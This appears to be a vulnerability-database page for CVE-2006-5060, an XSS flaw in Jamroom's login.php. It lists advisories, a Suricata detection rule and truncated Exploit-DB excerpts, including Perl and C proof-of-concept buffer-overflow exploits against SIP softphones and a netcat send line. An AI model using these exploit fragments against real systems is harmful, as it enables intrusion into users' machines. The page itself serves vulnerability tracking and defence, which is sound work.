CVE-2006-5060
published 2006-09-28CVE-2006-5060: Cross-site scripting (XSS) vulnerability in login.php in Jamroom 3.0.16 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via…
PriorityP422medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
2.20%
80.3th percentile
Cross-site scripting (XSS) vulnerability in login.php in Jamroom 3.0.16 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the forgot parameter in the forgot mode.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jamroom | jamroom | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Jamroom 3.0.16 login.php forgot cross site scripting (EDB-28659 / XFDB-29131)
vuldb·2026-04-23·CVSS 5.1
CVE-2006-5060 [MEDIUM] Jamroom 3.0.16 login.php forgot cross site scripting (EDB-28659 / XFDB-29131)
A vulnerability marked as problematic has been reported in Jamroom 3.0.16. This vulnerability affects unknown code of the file login.php. The manipulation of the argument forgot leads to basic cross site scripting.
This vulnerability is traded as CVE-2006-5060. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.
GHSA
GHSA-wmpr-rqrj-vhmc: Cross-site scripting (XSS) vulnerability in login
ghsa_unreviewed·2022-05-01
CVE-2006-5060 [MEDIUM] GHSA-wmpr-rqrj-vhmc: Cross-site scripting (XSS) vulnerability in login
Cross-site scripting (XSS) vulnerability in login.php in Jamroom 3.0.16 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the forgot parameter in the forgot mode.
Suricata
GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
suricata·2010-09-23
CVE-2006-0189 GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"GPL VOIP EXPLOIT SIP UDP Softphone overflow attempt"; content:"|3B|branch|3D|"; content:"a|3D|"; pcre:"/^a\x3D[^\n]{1000,}/smi"; reference:bugtraq,16213; reference:cve,2006-0189; classtype:misc-attack; sid:2100223; rev:2; metadata:created_at 2010_09_23, cve CVE_2006_0189, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Jamroom 3.0.16 - 'login.php' Cross-Site Scripting
exploitdb·2006-09-24
CVE-2006-5060 Jamroom 3.0.16 - 'login.php' Cross-Site Scripting
Jamroom 3.0.16 - 'login.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/20162/info
Jamroom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.net/[path]/login.php?mode=forgot&forgot=[xss]
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
Exploit-DB
eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)
exploitdb·2006-01-12
CVE-2006-0189 eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)
eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)
---
#!/usr/bin/perl -s
# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info = 3.0.1.2
# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
# Lets face it, most users wont know the difference between tcp and udp even if
# if it bites them in the ass, so the port is chosen in the hope that nat'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.
# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.
# win32_bin
Exploit-DB
eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)
exploitdb·2006-01-12
CVE-2006-0189 eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)
eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)
---
/***************************************
eStara Softphone buffer overflow exploit
tested on :
eStara Softphone 3.0.1.14
||||||
eStara Softphone 3.0.1.46
Vender website : http://www.estara.com/softphone/softph.exe
Run this application, then use nc to send builded packet :
nc -u 127.0.0.1 5060
#include
unsigned char invite[] = {
0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37,
0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x0D, 0x0A,
0x56, 0x69, 0x61, 0x3A, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x2F, 0x55, 0x44, 0x50,
0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x3A, 0x33, 0x33, 0x33, 0x33,
0x3B, 0x62, 0x72, 0x
No writeups or analysis indexed.
http://secunia.com/advisories/22077http://securityreason.com/securityalert/1649http://www.securityfocus.com/archive/1/446879/100/0/threadedhttp://www.securityfocus.com/bid/20162http://www.vupen.com/english/advisories/2006/3766https://exchange.xforce.ibmcloud.com/vulnerabilities/29131http://secunia.com/advisories/22077http://securityreason.com/securityalert/1649http://www.securityfocus.com/archive/1/446879/100/0/threadedhttp://www.securityfocus.com/bid/20162http://www.vupen.com/english/advisories/2006/3766https://exchange.xforce.ibmcloud.com/vulnerabilities/29131
2006-09-28
Published